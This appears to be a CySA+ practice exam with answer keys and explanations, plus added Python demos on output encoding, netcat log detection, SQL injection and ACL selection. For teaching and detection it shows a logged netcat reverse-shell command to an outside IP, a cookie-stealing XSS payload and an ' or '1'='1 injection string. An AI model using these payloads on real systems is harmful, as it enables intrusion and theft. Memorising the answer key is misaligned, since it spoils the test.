CompTIA CySA+ (CS0-003) Practice Exam #3
Dion Training is hiring a penetration testing firm to conduct an assessment of its corporate network. As part of the contract, the company has specified that it will not provide any network details to the penetration testing firm. Instead, the company wants to see how much information about the network can be found by the penetration testers using open-source research and scanning the corporate network. What type of assessment is this considered? Red box Black box White box Gray box
Black box In a black box assessment, the penetration tester takes an average hacker's role with no internal knowledge of the target system. Testers are not provided with any architecture diagrams or source code that is not publicly available. A black-box penetration test determines the vulnerabilities in a system that are exploitable from outside the network.
Jamie's organization is attempting to budget for the next fiscal year. Jamie has calculated that the asset value of a database server is $120,000. Based on her analysis, she believes that a data breach of this server will occur once every four years and that the risk factor (exposure factor) is 30%. What is the ALE for a data breach within Jamie's organization? $90,000 $360,000 $9,000 $36,000
$9,000 The single loss expectancy (SLE) is the amount that would be lost in a single occurrence: the asset value (AV) times the risk factor (RF), also called the exposure factor. The annual loss expectancy (ALE) is the total cost of a risk to an organization per year, determined by multiplying the SLE by the annual rate of occurrence (ARO); an event expected once every four years has an ARO of 0.25.
SLE = AV x RF = $120,000 x 0.3 = $36,000
ALE = SLE x ARO = $36,000 x 0.25 = $9,000
In the event of a cybersecurity breach, what legal aspects should primarily be considered when communicating with external stakeholders? Internal corporate policy Compliance with data breach notification laws Public relations strategy Contractual obligations with clients or partners
Compliance with data breach notification laws Legal considerations primarily involve complying with local, national, or international data breach notification laws and regulations, which typically require the organization to notify affected parties within a certain timeframe. While internal policies are important, they do not typically carry the legal weight that breach notification laws do. Compliance with these laws should be a primary consideration. While important, contractual obligations are specific to individual relationships and may not have the broad legal implications that breach notification laws do. While managing public relations is a crucial aspect of breach communication, it does not directly involve legal considerations.
An analyst reviews a triple-homed firewall configuration that connects to the internet, a private network, and one other network. Which of the following would best describe the third network connected to this firewall? NIDS DMZ Subnet GPO
DMZ A triple-homed firewall connects to three networks: internal (private), external (internet/public), and the demilitarized zone (DMZ). The DMZ network hosts systems that must be reachable from external hosts, such as public web or mail servers, so that a compromise of one of them does not give direct access to the private network. A Group Policy Object (GPO) is a collection of Group Policy settings that defines what a system looks like and how it behaves for a defined group of users. A network intrusion detection system (NIDS) is a system that attempts to detect hacking activities, denial of service attacks, or port scans on a computer network or a computer itself. A subnet is a logical subdivision of an IP network.
Which of the following is NOT a means of improving data validation and trust? Decrypting data at rest Encrypting data in transit Using MD5 checksums for files Implementing Tripwire
Decrypting data at rest Encrypting data in transit protects the confidentiality and integrity of the data while it moves, and therefore trust. Hashing files with MD5 and checking the result against known valid checksums provides integrity, and therefore validation and trust. Implementing a file integrity monitoring program, such as Tripwire, would also improve data validation and trust. Decrypting data at rest does not improve data validation or trust, since decrypted data at rest is exposed to unauthorized reading and modification.
Joseph is interpreting a vulnerability that has a CVSS (v3.1) base score of 8.3. In what risk category would this vulnerability fit? High Low Critical Medium
High CVSS metrics are categorized as critical, high, medium, low, or none based on their numerical score. Vulnerabilities with CVSS base scores rated 9.0 or above are classified as critical. CVSS scores between 7.0 and 8.9 are classified as high. CVSS scores between 4.0 and 6.9 are classified as medium. CVSS scores between 0.1 and 3.9 are classified as low. CVSS scores of 0.0 are classified as none.
Which of the following secure coding best practices ensures a character like < is translated into the &lt; string when writing to an HTML page? Input validation Error handling Output encoding Session management
Output encoding Output encoding involves translating special characters into a different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the &lt; string when writing to an HTML page. The encoding must match the context the data is written into (HTML body, HTML attribute, JavaScript, URL), which is why it is applied at output time rather than when the data is first received. Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering the malfunction of various downstream components. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID.
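As an added example (not part of the original exam question or its explanation), the following Python implements output encoding for the HTML body context and contrasts it with unencoded interpolation of the same comment string. The function names, the entity table, and the attacker comment are assumptions constructed for the demonstration:

```python
import html

# Characters with special meaning in an HTML body or quoted attribute, mapped
# to their entity forms (the set OWASP recommends encoding for HTML contexts).
HTML_ENTITIES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
}


def encode_for_html(untrusted: str) -> str:
    """Translate each special character into its entity in a single pass.

    Every character, including '&', is encoded exactly once; an input that
    already contains an entity such as '&amp;' is treated as literal text."""
    return "".join(HTML_ENTITIES.get(ch, ch) for ch in untrusted)


def render_comment_unsafe(comment: str) -> str:
    # Vulnerable pattern: untrusted text interpolated straight into markup,
    # so an attacker-supplied <script> tag becomes real markup.
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    # Output encoding applied at the moment the data is written into the
    # HTML context; the browser displays the text instead of parsing it.
    return f'<p class="comment">{encode_for_html(comment)}</p>'


def contains_tag(markup: str, tag: str) -> bool:
    # Crude check for the demonstration: does the tag appear as real markup?
    return f"<{tag}" in markup.lower()


if __name__ == "__main__":
    # Constructed attacker input (hypothetical comment body).
    payload = '<script>alert(document.cookie)</script><img src=x onerror="alert(1)">'
    print("unsafe :", render_comment_unsafe(payload))
    print("safe   :", render_comment_safe(payload))
    # Encoding is lossless: a standard decoder recovers the original text.
    assert html.unescape(encode_for_html(payload)) == payload
```

The single-pass table lookup is deliberate: running an encoder twice over the same string, or encoding before storage and again at output, produces double-encoded text such as `&amp;lt;`, which is why the encoding belongs at the output boundary only.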
What document typically contains high-level statements of management intent? Policy Standard Guideline Procedure
Policy Policies are high-level statements of management intent. Compliance with policies by employees should be mandatory. An information security policy will generally contain broad statements around the various cybersecurity objectives. Procedures describe exactly how to use the standards and guidelines to implement the countermeasures that support the policy. Standards and baselines describe specific products, configurations, or other mechanisms to secure the systems. A guideline is a recommendation that can specify the methodology that is to be used.
What is the primary purpose of the MITRE ATT&CK framework? Describing the linear progression of a cyber attack Providing a knowledge base of tactics, techniques, and procedures used by attackers Testing methodology for web applications Understanding the relationships between the elements of a cyber attack
Providing a knowledge base of tactics, techniques, and procedures used by attackers The MITRE ATT&CK framework provides a detailed matrix of the tactics, techniques, and procedures (TTPs) used by attackers, aiding in understanding and mitigating potential threats. This is a primary focus of the Diamond Model of Intrusion Analysis, not the MITRE ATT&CK framework. This is the focus of the OWASP Testing Guide, not the MITRE ATT&CK framework. This is the main focus of the Cyber Kill Chain, not the MITRE ATT&CK framework.
A buffer overflow vulnerability in Dion Cybertronix Corporation's system was resolved and verified. However, after some weeks, the same vulnerability was identified again. What does this situation demonstrate? Access Control Secure Coding Recurrence Mitigation
Recurrence This situation demonstrates recurrence, as a previously resolved vulnerability has appeared again. The growing complexity of modern systems adds to the challenge, making it harder to identify and address all vulnerabilities. While secure coding aims to prevent vulnerabilities, the reappearance of a vulnerability does not directly relate to it. Access control manages who can access resources in a system. It does not directly relate to the reappearance of a vulnerability. Mitigation reduces the likelihood of the vulnerability being exploited.
Which of the following vulnerabilities is considered a "Top 10" due to its widespread occurrence and potential impact? SolarWinds Supply Chain Attack Google SEO Poisoning Conficker Worm SQL Injection
SQL Injection SQL Injection attacks are pervasive and can have serious consequences, such as allowing an attacker to view, manipulate, or delete data from a database, making this the correct answer. The Conficker worm was a widespread issue when it emerged, but it is not typically categorized as a top 10 vulnerability. While malicious SEO practices can present security concerns, they do not represent a top 10 vulnerability in the same way as SQL Injection. While the SolarWinds supply chain attack was significant, it was a specific, sophisticated attack, not a common, widespread vulnerability like SQL Injection.
You are investigating a suspected compromise. You have noticed several files that you don't recognize. How can you quickly and effectively check if the files have been infected with malware? Run the Strings tool against each file to identify common malware identifiers Disassemble the files and conduct static analysis on them using IDA Pro Submit the files to an open-source intelligence provider like VirusTotal Scan the files using a local anti-virus/anti-malware engine
Submit the files to an open-source intelligence provider like VirusTotal The best option is to submit them to an open-source intelligence provider like VirusTotal. VirusTotal allows you to quickly analyze suspicious files and URLs with many anti-malware engines at once to detect types of malware. It then automatically shares the submissions with the security community as well, so do not upload files that may contain sensitive or proprietary data; look up the file's hash instead. Disassembly and static analysis would require a higher level of knowledge and more time to complete. Running the Strings tool can help identify text if the code is not encoded in a specific way within the malware, but you have to know what you are looking for, such as a malware signature. You should never rely on scanning the files with a local anti-virus or anti-malware engine if you suspect the workstation or server has already been compromised, because the scanner itself may have been tampered with.
You have just begun an investigation by reviewing the security logs. During the log review, you notice the following lines: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- sc config schedule start auto net start schedule at 10:42 "c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- What BEST describes what is occurring and what action do you recommend to stop it? The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not malicious activity The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network The host (123.12.34.12) is a rogue device on the network; you should recommend removing the host from the network The host is beaconing to 123.12.34
The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network The three commands are a persistence and remote-access sequence on a Windows host. "sc config schedule start auto" sets the Task Scheduler service to start automatically, "net start schedule" starts it immediately, and "at 10:42" schedules a job that runs netcat (nc.exe) from c:\temp, connecting out to 123.12.34.12 on port 443 with "-e cmd.exe", which attaches a command shell to the connection (a reverse shell). Port 443 is chosen so the traffic blends in with HTTPS. The logged host is the victim, not 123.12.34.12; "at" is the legacy Windows scheduler, not a cron job; and a netcat reverse shell launched from a temp directory is malicious, so a recommendation is required. Isolate the host from the network and preserve it for forensic analysis.
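As an added illustration that is not part of the original exam, this Python snippet shows detection logic an analyst could run over log lines like those above: it recognizes the Task Scheduler preparation commands and parses an "at" job that launches netcat with -e or -c, extracting the remote host, port and the program bound to the connection. The log lines are constructed to mirror the question, and all function, pattern and field names are assumptions:

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed log excerpt mirroring the three commands in the question.
LOG_LINES = [
    "sc config schedule start auto",
    "net start schedule",
    'at 10:42 "c:\\temp\\nc.exe 123.12.34.12 443 -e cmd.exe"',
]

# Legacy Windows scheduler:  at <HH:MM> "<command line>"  (quotes optional)
AT_JOB = re.compile(r'^at\s+(?P<time>\d{1,2}:\d{2})\s+"?(?P<cmd>.*?)"?\s*$', re.IGNORECASE)

# netcat run with -e/-c:  <path>nc.exe <ipv4> <port> ... -e <program>
NC_SHELL = re.compile(
    r"(?P<bin>\S*nc(?:at)?\.exe|\bnc\b)\s+"
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})\b"
    r".*?\s-[ec]\s+(?P<shell>\S+)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    time: str           # scheduled run time from the "at" job
    binary: str         # path of the netcat binary as it appears in the job
    remote_host: str    # where the shell connects out to
    remote_port: int
    shell: str          # program attached to the socket by -e/-c
    from_temp_dir: bool # binary launched from a \temp\ directory


def analyze(lines: List[str]) -> Tuple[bool, List[Finding]]:
    """Return (scheduler_prepared, findings).

    scheduler_prepared is True when the log shows the Task Scheduler service
    being set to auto-start or started; findings lists every scheduled job
    that launches netcat with -e/-c (a shell bound to a network connection)."""
    scheduler_prepared = False
    findings: List[Finding] = []
    for raw in lines:
        line = raw.strip()
        lowered = line.lower()
        if lowered.startswith("sc config schedule") or lowered == "net start schedule":
            scheduler_prepared = True
            continue
        job = AT_JOB.match(line)
        if not job:
            continue
        nc = NC_SHELL.search(job["cmd"])
        if not nc:
            continue
        findings.append(Finding(
            time=job["time"],
            binary=nc["bin"],
            remote_host=nc["host"],
            remote_port=int(nc["port"]),
            shell=nc["shell"],
            from_temp_dir="\\temp\\" in nc["bin"].lower(),
        ))
    return scheduler_prepared, findings


def describe(lines: List[str]) -> str:
    """One-line analyst verdict for the first netcat job found, if any."""
    prepared, findings = analyze(lines)
    if not findings:
        return "no scheduled netcat jobs found"
    f = findings[0]
    verdict = (f"at {f.time} the host runs {f.binary} to bind {f.shell} to a "
               f"connection to {f.remote_host}:{f.remote_port} (reverse shell)")
    if prepared:
        verdict += "; the Task Scheduler service was enabled first"
    return verdict + " -> isolate the host from the network"


if __name__ == "__main__":
    print(describe(LOG_LINES))
```

The same parser would miss a job written with schtasks.exe or a netcat binary renamed to something innocuous, so in practice this logic belongs alongside a rule on the outbound connection itself (an unexpected process talking to an external address on 443).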
You suspect that a system's firmware has been compromised. Which type of firmware would provide resistance against such an attack? Standard Firmware Trusted Firmware UEFI BIOS
Trusted Firmware Trusted Firmware is designed to be resistant to attacks, providing a secure foundation for system boot and operating system load. BIOS (Basic Input/Output System) is a type of firmware used during the booting process, but it's not designed to be resistant to attacks like Trusted Firmware. While UEFI (Unified Extensible Firmware Interface) is a specification for a software interface between an operating system and platform firmware, it does not inherently provide resistance against attacks. Standard Firmware may not include the security features found in Trusted Firmware.
You have been investigating how a malicious actor could exfiltrate confidential data from a web server to a remote host. After an in-depth forensic review, you determine that a rootkit's installation had modified the web server's BIOS. After removing the rootkit and reflashing the BIOS to a known good image, what should you do to prevent the malicious actor from affecting the BIOS again? Utilize secure boot Utilize file integrity monitoring Install an anti-malware application Install a host-based IDS
Utilize secure boot Since you are trying to protect the BIOS, utilizing secure boot is the best choice. Secure boot is a security system offered by UEFI. It is designed to prevent a computer from being hijacked by a malicious OS. Under secure boot, UEFI is configured with digital certificates from valid OS vendors. The system firmware checks the operating system boot loader using the stored certificate to ensure that the OS vendor has digitally signed it. This prevents a boot loader that has been changed by malware (or an OS installed without authorization) from being used. The TPM can also be invoked to compare hashes of key system state data (boot firmware, boot loader, and OS kernel) to ensure they have not been tampered with by a rootkit. The other options are all good security practices, but they only apply once you have already booted into the operating system. This makes them ineffective against boot sector or rootkit attacks.
What should a vulnerability report include if a cybersecurity analyst wants it to reflect the assets scanned accurately? Processor utilization Organizational governance Virtual hosts Log disposition
Virtual hosts Vulnerability reports should include both the physical hosts and the virtual hosts on the target network. A common mistake of new cybersecurity analysts is to include only the physical hosts, thereby missing many network assets.
Based on some old SIEM alerts, you have been asked to perform a forensic analysis on a given host. You have noticed that some SSL network connections are occurring over ports other than port 443. The SIEM alerts indicate that copies of svchost.exe and cmd.exe have been found in the host's %TEMP% folder. The logs indicate that RDP connections have previously connected with an IP address that is external to the corporate intranet, as well. What threat might you have uncovered during your analysis? DDoS APT Ransomware Software vulnerability
APT The provided indicators of compromise appear to be from an Advanced Persistent Threat (APT). These attacks tend to go undetected for several weeks or months and utilize secure communication to external IPs as well as Remote Desktop Protocol connections to provide the attackers with access to the infected host. While an APT might use a software vulnerability to gain their initial access, the full description provided in the question that includes the files being copied and executed from the %TEMP% folder and the use of SSL/RDP connections indicates longer-term exploitation, such as one caused by an APT.
Your company has just announced a change to an "API first" model of software development. As a cybersecurity analyst, you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. Which of the following is the primary basis for an attack against this vulnerability? Insufficient logging and monitoring makes it impossible to detect when insecure deserialization vulnerabilities are exploited Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution Lack of input validation could allow for a SQL attack Lack of input validation could lead to a cross-site scripting attack
Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution When implementing an API, objects in memory on one computer can be serialized and passed to another for deserialization. If the API user is malicious, they may craft a fictitious object, serialize it appropriately, and send it through the API, where deserializing it executes attacker-controlled logic. The defenses are to expose the API only to trusted sources, to accept only primitive data types rather than serialized objects that can carry executable behavior, and to verify the integrity (for example, with a signature) of any serialized data that must be accepted. Cross-site scripting and SQL injection are separate input-validation problems and are not the basis of an attack on deserialization. Insufficient logging and monitoring would keep an analyst from detecting that a deserialization vulnerability had been exploited, but it is not itself the basis of the attack.
Which of the following types of attackers are sophisticated and highly organized people or teams typically sponsored by a nation-state? Ethical hacker Script kiddies Advanced Persistent Threat Hacktivists
Advanced Persistent Threat Advanced Persistent Threat (APT) attackers are sophisticated and have access to financial and technical resources typically provided by a government. An APT is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware. A hacktivist is an attacker that is motivated by a social issue or political cause. A script kiddie has little skill or sophistication and uses publicly available tools and techniques. An ethical hacker specializes in penetration testing and in other testing methodologies that ensure the security of an organization's information systems. An ethical hacker is also known as a white hat hacker.
While conducting a static analysis source code review of a program, you see the following line of code: String query = "SELECT * FROM CUSTOMER WHERE CUST_ID='" + request.getParameter("id") + "'"; What is the largest security issue with this line of code? The * operator will allow retrieval of every data field about this customer in the CUSTOMER table The code is using parameterized queries An SQL injection could occur because input validation is not being used on the id parameter This code is vulnerable to a buffer overflow attack
An SQL injection could occur because input validation is not being used on the id parameter This code takes the "id" parameter directly from the user or another program and concatenates it into the query text without any input validation, so it can be used as an attack vector for SQL injection. If a malicious user controls the id value, they can supply something like ' or '1'='1, which turns the statement into: SELECT * FROM CUSTOMER WHERE CUST_ID='' or '1'='1'. Because '1' always equals '1', the WHERE clause is always true and EVERY record in the CUSTOMER table is returned to the attacker. There are reasons for and against the use of the * operator when writing SQL statements; its presence alone does not indicate a weakness. With only one line of code under review, you cannot say whether the program is vulnerable to a buffer overflow attack, and Java strings are bounds-checked in any case. This code is not using parameterized queries; if it did, the vulnerability would be eliminated. A parameterized query (prepared statement) keeps the query structure fixed and passes the user's input to the database driver as a bound value, so the input is never interpreted as SQL. It is a data-binding mechanism, not a form of output encoding.
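As an added example rather than code from the original question, the following Python reproduces the vulnerable concatenation against an in-memory SQLite table, shows the ' or '1'='1 payload returning every row, and contrasts it with a parameterized query plus an allow-list validation step. The table contents, customer IDs and function names are constructed assumptions:

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the CUSTOMER table in the question."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE CUSTOMER (CUST_ID TEXT PRIMARY KEY, NAME TEXT, CARD TEXT)")
    conn.executemany("INSERT INTO CUSTOMER VALUES (?, ?, ?)", [
        ("1001", "Alice", "4111-xxxx-xxxx-1111"),
        ("1002", "Bob", "5500-xxxx-xxxx-0004"),
        ("1003", "Carol", "3400-xxxxxx-x0009"),
    ])
    return conn


def build_vulnerable_query(cust_id: str) -> str:
    # Mirrors the reviewed Java line: untrusted input spliced into the SQL text.
    return "SELECT * FROM CUSTOMER WHERE CUST_ID='" + cust_id + "'"


def lookup_vulnerable(conn: sqlite3.Connection, cust_id: str) -> List[Tuple]:
    # The database parses whatever the attacker put into cust_id as SQL.
    return conn.execute(build_vulnerable_query(cust_id)).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, cust_id: str) -> List[Tuple]:
    # Query structure is fixed; the driver binds cust_id as data, never as SQL.
    return conn.execute("SELECT * FROM CUSTOMER WHERE CUST_ID=?", (cust_id,)).fetchall()


def lookup_validated(conn: sqlite3.Connection, cust_id: str) -> List[Tuple]:
    # Defense in depth: allow-list the parameter's expected shape before binding.
    if not (cust_id.isdigit() and len(cust_id) <= 10):
        raise ValueError("invalid customer id")
    return lookup_parameterized(conn, cust_id)


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"          # constructed attacker input
    print(build_vulnerable_query(payload))
    print("vulnerable    :", lookup_vulnerable(db, payload))    # all three rows
    print("parameterized :", lookup_parameterized(db, payload))  # no match
```

With the parameterized version the literal string ' or '1'='1 is compared against CUST_ID and matches nothing; the validation step in lookup_validated rejects it before it reaches the database at all, which also keeps garbage out of the logs.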
If a critical software application starts to slow down with each applied security patch, how might this affect vulnerability management? By ensuring seamless integration with other systems in the network By making the application more robust and resistant to crashes By increasing user satisfaction with the application By causing hesitation or delays in applying patches due to the fear of degrading system performance
By causing hesitation or delays in applying patches due to the fear of degrading system performance If patching degrades performance, an organization might hesitate to apply necessary patches, leaving the system vulnerable. System integration and vulnerability management are distinct considerations; performance degradation doesn't improve integration. While robustness is a desirable feature, performance degradation doesn't enhance it and may actually cause hesitations in patching vulnerabilities. Degrading performance is likely to decrease user satisfaction, not increase it, and it may discourage timely vulnerability patching.
In a scenario where an organization has implemented a strict change management policy, how might this policy influence the process of remediating identified vulnerabilities? By reducing the operational costs of the IT department By creating bureaucratic delays in implementing necessary patches and updates By ensuring automatic remediation of vulnerabilities By guaranteeing seamless coordination between different departments
By creating bureaucratic delays in implementing necessary patches and updates If governance policies require multiple approvals for actions, they could slow down the process of remediating vulnerabilities. Governance policies do not ensure automatic remediation; they guide an organization's approach to handling vulnerabilities. While effective governance can improve interdepartmental coordination, it does not inherently expedite vulnerability remediation. While operational cost is a concern in governance, it does not directly impact the speed or efficiency of vulnerability remediation.
Which of the following provides a standard nomenclature for describing security-related software flaws? CVE SOX VPC SIEM
CVE Common Vulnerabilities and Exposures (CVE) is an element of the Security Content Automation Protocol (SCAP) that provides a standard nomenclature for describing security flaws or vulnerabilities. A SIEM is a solution that provides a real-time or near-real-time analysis of security alerts generated by network hardware and applications. A VPC is a private network segment made available to a single cloud consumer on a public cloud. The Sarbanes-Oxley Act (SOX) dictates requirements for storing and retaining documents relating to an organization's financial and business operations, including the type of documents stored and their retention periods.
What SCAP component provides a list of entries that contains an identification number, a description, and a public reference for each publicly known weakness in a piece of software? XCCDF CPE CVE CCE
CVE The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. XCCDF (extensible configuration checklist description format) is a language that is used in creating checklists for reporting results. The Common Configuration Enumeration (CCE) provides unique identifiers to system configuration issues to facilitate fast and accurate correlation of configuration data across multiple information sources and tools. Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise's computing assets.
Which of the following elements is LEAST likely to be included in an organization's data retention policy? Description of information that needs to be retained Maximum retention period Classification of information Minimum retention period
Classification of information Data retention policies highlight what types of information an organization will maintain and the length of time they will maintain it. Data classification would not be covered in the retention policy but would be a key part of your organization's data classification policy.
What sanitization technique uses only logical techniques to remove data, such as overwriting a hard drive with a random series of ones and zeroes? Degauss Destroy Clear Purge
Clear Clear applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques. Clearing involves overwriting data once (and seldom more than three times) with repetitive data (such as all zeros) or resetting a device to factory settings. Purging data is meant to eliminate information from being feasibly recovered even in a laboratory environment. Destroy requires physical destruction of the media, such as pulverization, melting, incineration, and disintegration. Degaussing is the process of decreasing or eliminating a remnant magnetic field. Degaussing is an effective method of sanitization for magnetic media, such as hard drives and floppy disks.
Fail to Pass Systems has just become the latest victim in a large scale data breach by an APT. Your initial investigation confirms a massive exfiltration of customer data has occurred. Which of the following actions do you recommend to the CEO of Fail to Pass Systems in handling this data breach? Provide a statement to the press that minimizes the scope of the breach Conduct a 'hack-back' of the attacker in order to retrieve the stolen information Purchase a cyber insurance policy, alter the date of the incident in the log files, and file an insurance claim Conduct notification to all affected customers within 72 hours of the discovery of the breach
Conduct notification to all affected customers within 72 hours of the discovery of the breach Most breach notification laws require prompt notification; the GDPR, for example, requires notifying the supervisory authority within 72 hours of becoming aware of a breach and affected individuals without undue delay. All other options are either unethical, constitute insurance fraud, or are illegal. Conducting a hack-back is illegal, and once data has been taken it is nearly impossible to "steal it back" because the attacker almost certainly has copies. Providing a misleading statement to the press is unethical, and if your company is caught lying about the extent of the breach, it could further hurt your reputation. Purchasing a cyber insurance policy and altering the log file dates to make it look like the attack occurred after buying the policy would be insurance fraud, which is both unethical and illegal.
James, a programmer at Apple Computers, is surfing the internet on his lunch break. He comes across a rumor site focused on providing details of the upcoming iPhone being released in a few months. James knows that Apple likes to keep its product details a secret until it is publicly announced. As James is looking over the website, he sees a blog post with an embedded picture of a PDF containing detailed specifications for the next iPhone and labeled "Proprietary Information - Internal Use Only." The new iPhone is still several months away from release. What should James do next? Contact his team lead and ask what he should do next Contact the service desk or incident response team to determine what to do next Contact the website's owner and request they take down the PDF Reply to the blog post and deny the accuracy of the specifications
Contact the service desk or incident response team to determine what to do next This is an example of either a data leak or a data breach. James is not sure how the website got the details of the product's specifications. Therefore, he should follow his organizational procedures for notification that internal company information has been leaked to the internet. In most organizations, the service desk acts as the single point of contact for all IT issues (even possible data breaches), and they can refer James to the incident response team (if one is currently stood up). Since James works as a programmer, it is unlikely that his team lead is responsible for handling a data leak or data breach, so it is better to contact the service desk first. James should not contact the website directly nor reply to the blog post. Instead, he should leave the response actions to the security team and the incident response team.
Your organization's computer network has been experiencing some unusual activities. You are considering establishing a Computer Security Incident Response Team (CSIRT) to address these incidents. Which of the following would be a primary function of a CSIRT? Creating marketing strategies Exploiting vulnerabilities Writing security policies Coordinating the response to security incidents
Coordinating the response to security incidents A CSIRT's main role is to coordinate the response to computer security incidents, which includes identifying, managing, and preventing further incidents. Creating marketing strategies is outside the scope of a CSIRT's responsibilities, which are focused on computer security. Exploiting vulnerabilities is not a function of a CSIRT. This is a behavior associated with threat actors, not with defensive security teams. While a CSIRT might contribute to the development of security policies based on their incident response experiences, their primary function is to respond to security incidents, not to write policies.
Review the following packet captured at your NIDS: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 23:12:23.154234 IP 86.18.10.3:54326 > 71.168.10.45:3389 Flags [P.], seq 1834:1959, ack 1, win 511, options [nop,nop,TS val 263451334 ecr 482862734], length 125 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- After reviewing the packet above, you discovered there is an unauthorized service running on the host. Which of the following ACL entries should be implemented to prevent further access to the unauthorized service while maintaining full access to the approved services running on this host? DENY TCP ANY HOST 86.18.10.3 EQ 25 DENY IP HOST 71.168.10.45 ANY EQ 25 DENY IP HOST 86.18.10.3 EQ 3389 DENY TCP ANY HOST 71.168.10.45 EQ 3389
DENY TCP ANY HOST 71.168.10.45 EQ 3389 Since the question asks you to prevent access to the unauthorized service, you need to stop port 3389 from accepting connections on 71.168.10.45 (the host). This entry denies ANY source from connecting to the host over TCP port 3389, the unauthorized Remote Desktop Protocol service, while leaving every other port on the host reachable. The two entries that reference port 25 target SMTP, not the service seen in the capture, and "DENY IP HOST 86.18.10.3 EQ 3389" is not a usable entry: an IP-level rule has no port field, and it names only the single external source instead of protecting the host.
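As an added example that is not part of the original explanation, the following Python parses the flow from the captured packet and evaluates each candidate ACL entry against it using a simplified Cisco-style extended ACL grammar. It treats a syntactically invalid entry (an IP-protocol rule carrying EQ, or a rule missing its destination) as unusable, and rejects any entry that would also block a constructed "approved" HTTPS flow to the same host. The Flow type, function names and the choice of HTTPS as the approved service are assumptions:

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed NIDS line reproducing the flow from the question.
PACKET = "23:12:23.154234 IP 86.18.10.3:54326 > 71.168.10.45:3389 Flags [P.], length 125"

FLOW_RE = re.compile(
    r"IP (?P<src>\d+(?:\.\d+){3}):(?P<sport>\d+) > (?P<dst>\d+(?:\.\d+){3}):(?P<dport>\d+)"
)


@dataclass(frozen=True)
class Flow:
    proto: str
    src: str
    dst: str
    dport: int


def parse_flow(line: str, proto: str = "tcp") -> Flow:
    """Extract source, destination and destination port from the capture line.
    The TCP flags field in the line shows it is TCP, so the protocol is passed in."""
    m = FLOW_RE.search(line)
    if not m:
        raise ValueError(f"no IP flow found in: {line}")
    return Flow(proto, m["src"], m["dst"], int(m["dport"]))


def parse_acl(entry: str) -> dict:
    """Parse a simplified extended ACL entry:
       <PERMIT|DENY> <IP|TCP|UDP> <ANY|HOST a.b.c.d> <ANY|HOST a.b.c.d> [EQ <port>]
    Raises ValueError for entries that are not well formed."""
    tokens = entry.upper().split()
    if len(tokens) < 4 or tokens[0] not in ("PERMIT", "DENY"):
        raise ValueError(f"malformed entry: {entry}")
    action, proto = tokens[0], tokens[1].lower()
    pos = 2

    def take_addr() -> Optional[str]:
        nonlocal pos
        if pos < len(tokens) and tokens[pos] == "ANY":
            pos += 1
            return None                      # None means "any address"
        if pos + 1 < len(tokens) and tokens[pos] == "HOST":
            pos += 2
            return tokens[pos - 1]
        raise ValueError(f"expected ANY or HOST <ip> at token {pos} in: {entry}")

    src = take_addr()
    dst = take_addr()
    port: Optional[int] = None
    if pos < len(tokens) and tokens[pos] == "EQ":
        if pos + 1 >= len(tokens):
            raise ValueError(f"EQ without a port in: {entry}")
        port = int(tokens[pos + 1])
    if port is not None and proto not in ("tcp", "udp"):
        # "IP" has no port field; only TCP/UDP entries may carry EQ <port>.
        raise ValueError(f"EQ <port> requires TCP or UDP, not {proto.upper()}: {entry}")
    return {"action": action, "proto": proto, "src": src, "dst": dst, "port": port}


def matches(rule: dict, flow: Flow) -> bool:
    return (
        rule["proto"] in ("ip", flow.proto)
        and rule["src"] in (None, flow.src)
        and rule["dst"] in (None, flow.dst)
        and rule["port"] in (None, flow.dport)
    )


def select_acl(candidates: List[str], block: Flow, keep: List[Flow]) -> List[str]:
    """Return the candidate DENY entries that drop `block` and touch none of `keep`.
    Entries that fail to parse are reported as unusable and skipped."""
    chosen = []
    for entry in candidates:
        try:
            rule = parse_acl(entry)
        except ValueError as err:
            print(f"unusable: {err}")
            continue
        if rule["action"] != "DENY" or not matches(rule, block):
            continue
        if any(matches(rule, f) for f in keep):
            continue
        chosen.append(entry)
    return chosen


CANDIDATES = [
    "DENY TCP ANY HOST 86.18.10.3 EQ 25",
    "DENY IP HOST 71.168.10.45 ANY EQ 25",
    "DENY IP HOST 86.18.10.3 EQ 3389",
    "DENY TCP ANY HOST 71.168.10.45 EQ 3389",
]

if __name__ == "__main__":
    rdp = parse_flow(PACKET)
    # Constructed assumption: HTTPS on the same host is an approved service.
    approved = [Flow("tcp", "86.18.10.3", "71.168.10.45", 443)]
    print(select_acl(CANDIDATES, rdp, approved))
```

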